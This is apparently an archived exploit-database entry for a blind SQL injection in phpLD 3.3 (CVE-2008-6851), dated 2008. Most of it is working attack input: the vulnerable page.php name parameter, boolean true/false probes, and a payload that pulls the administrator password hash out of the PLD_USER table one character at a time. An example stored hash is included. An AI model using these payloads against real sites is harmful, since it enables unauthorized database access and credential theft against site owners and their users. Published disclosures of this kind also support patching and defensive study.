PHPLD 3.3 - Blind SQL Injection

Author: fuzion
type: webapps
platform: php
port: 
date_added: 2008-12-22 
date_updated: 2017-01-05 
verified: 1 
codes: OSVDB-55710;CVE-2008-6851 
tags: 
aliases:  
screenshot_url:  
application_url: 

phpLD 3.3 Blind SQL Injection
http://www.phplinkdirectory.com/

magic_quotes_gpc = Off
register_globals = On

Vulnerable:
GET http://site/phpld/page.php?name=

True Request:
(validpagename)' or 1=1#

False Request:
(validpagename)' or 1=0#

Try this (urlencode):
(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc...

Field value example:
{sha1}dd94709528bb1c83d08f3088d4043f4742891f4f


- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-23]